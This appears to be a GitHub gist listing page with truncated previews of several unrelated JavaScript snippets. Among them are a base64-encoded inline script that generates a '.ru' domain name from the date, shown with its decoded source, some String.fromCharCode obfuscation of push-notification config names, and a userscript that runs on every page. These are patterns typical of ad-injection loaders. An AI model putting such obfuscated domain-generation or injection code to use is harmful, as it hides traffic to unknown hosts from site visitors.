This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
! function () | |
{ | |
function o(t, n) | |
{ | |
var e, o = Object.keys(t); | |
return Object.getOwnPropertySymbols && (e = Object.getOwnPropertySymbols(t), n && (e = e.filter(function (n) | |
{ | |
return Object.getOwnPropertyDescriptor(t, n).enumerable | |
})), o.push.apply(o, e)), o | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function () { | |
var url = String.fromCharCode(112,117,115,104,95,117,114,108); | |
var cfg = String.fromCharCode(119,112,110,67,111,110,102,105,103); | |
window[cfg] = { | |
utm_source: 'og', | |
utm_campaign: 20914, | |
utm_content: '______', | |
domain: window.location.host, | |
proto: window.location.protocol | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script type="text/javascript" src="data:text/javascript;base64,KGZ1bmN0aW9uKCl7d2luZG93LkszPXdpbmRvdy5LM3x8e307SzMuVT1LMy5VfHx7fTtLMy5VLmE9ZnVuY3Rpb24oKXt2YXIgYT1uZXcgRGF0ZTthPU1hdGguZmxvb3IoKG5ldyBEYXRlKGEuZ2V0RnVsbFllYXIoKSsyLGEuZ2V0TW9udGgoKSxhLmdldERhdGUoKSkpLnNldFVUQ0hvdXJzKDAsMCwwLDApLzFFMyk7YT1wYXJzZUludCgxRTEyKihNYXRoLnNpbihhKSsxKSkudG9TdHJpbmcoMzIpO2Zvcih2YXIgYj1bInJ1Il0sZD1bXSxjPTA7YzxiLmxlbmd0aDsrK2MpZC5wdXNoKHtkb21haW46YSsiLiIrYltjXSxuYW1lOmF9KTtyZXR1cm4gZH07SzMuVS5iPWZ1bmN0aW9uKGEpe3ZhciBiPUszLlUuYSgpO3NldFRpbWVvdXQoYSwwLGJbMF0pfX0pKCk7"></script> | |
( | |
function(){ | |
window.K3=window.K3||{}; | |
K3.U=K3.U||{}; | |
K3.U.a=function(){ | |
var a=new Date; | |
a=Math.floor((new Date(a.getFullYear()+2,a.getMonth(),a.getDate())).setUTCHours(0,0,0,0)/1E3); // stamp 1652918400 | |
a=parseInt(1E12*(Math.sin(a)+1)).toString(32); // p5lsvf4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name Replacer | |
// @namespace https://127.0.0.1/ | |
// @version 0.1 | |
// @date 2020-04-29 | |
// @author XXX | |
// @description Replacer | |
// @include http://* | |
// @include https://* | |
// @run-at document-end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const checkOff = function(target, pattern){ | |
return Object.keys(pattern).every(key => { | |
const T = typeof(pattern[key]); | |
return (target.hasOwnProperty(key) && | |
(pattern[key] === null || | |
(T === typeof(target[key]) && | |
(Array.isArray(pattern[key]) | |
? Array.isArray(target[key]) | |
: (T === 'object' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function() { | |
var sgb_view = Object.create(HTMLElement.prototype); | |
if(!("spill" in Event.prototype)){ | |
Events.prototype.spill = function(){ | |
}; | |
} | |
sgb_view.createdCallback = function () { | |
var i, l; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
':' //; exec "$(command -v nodejs || command -v node)" "$0" "$@" | |
console.log('Hello world!'); |